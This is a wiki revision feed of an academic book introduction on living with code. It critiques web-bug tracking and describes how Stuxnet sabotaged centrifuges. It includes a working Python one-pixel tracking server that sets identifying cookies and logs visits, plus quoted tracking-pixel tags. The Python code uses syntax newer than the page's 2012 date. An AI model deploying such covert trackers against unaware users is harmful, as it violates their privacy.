&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Compactants: computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4706</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4706"/>
		<updated>2012-04-18T14:23:51Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming conditions of possibility for human living - not the only such conditions, to be sure, but ones that increasingly mediate our access to the others - crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such they have penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms - consider, for example, the pressure that real-time, softwarized distribution places on the print newspaper - as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. Such concerns relate to the interests of the previous century’s critical theorists, particularly their worry about the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project, a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al'' have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year new statistics demonstrate just how pervasive the computational world has become. These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
These devices also enable the assemblage of new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life would be startling, had we not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software acts as a mediator between ourselves and our corporeal experiences, even as it helps to constitute the world within which those experiences take place: it disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material: more ''tenuously'' material than the print and broadcast media that preceded it, almost less ''materially material''. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind rectangular panes of glass which yield only to certain prescribed forms of touch-based interface - here I am thinking of physical keyboards and trackpads as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has observed, is that print is flat and code is deep (though see F. Frabetti’s contribution to this book for a critique of that formulation).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior and send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
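&lt;br /&gt;
The mechanics are simple enough to sketch: a web bug is just an HTTP endpoint that returns a one-pixel image, sets an identifying cookie on the first visit, and logs every subsequent request. What follows is a minimal, illustrative server using only Python’s standard library - not any actual tracker’s code: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
import uuid &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
&lt;br /&gt;
# A valid 1x1 transparent GIF, the classic invisible web-bug payload. &lt;br /&gt;
PIXEL = bytes.fromhex( &lt;br /&gt;
    '47494638396101000100800000000000ffffff21f9040100000000' &lt;br /&gt;
    '2c00000000010001000002024401003b') &lt;br /&gt;
&lt;br /&gt;
class WebBug(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        uid = self.headers.get('Cookie')     # returning visitor, if any &lt;br /&gt;
        self.log_message('track uid=%s referer=%s', &lt;br /&gt;
                         uid, self.headers.get('Referer')) &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        if uid is None:                      # first visit: set the 'state' &lt;br /&gt;
            self.send_header('Set-Cookie', f'uid={uuid.uuid4()}') &lt;br /&gt;
        self.send_header('Content-Type', 'image/gif') &lt;br /&gt;
        self.send_header('Content-Length', str(len(PIXEL))) &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(PIXEL) &lt;br /&gt;
&lt;br /&gt;
HTTPServer(('', 8000), WebBug).serve_forever() &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Embedded in a page as an invisible one-pixel image, every load of that page then reports the visit, and the cookie ties visits together over time. &lt;br /&gt;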
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
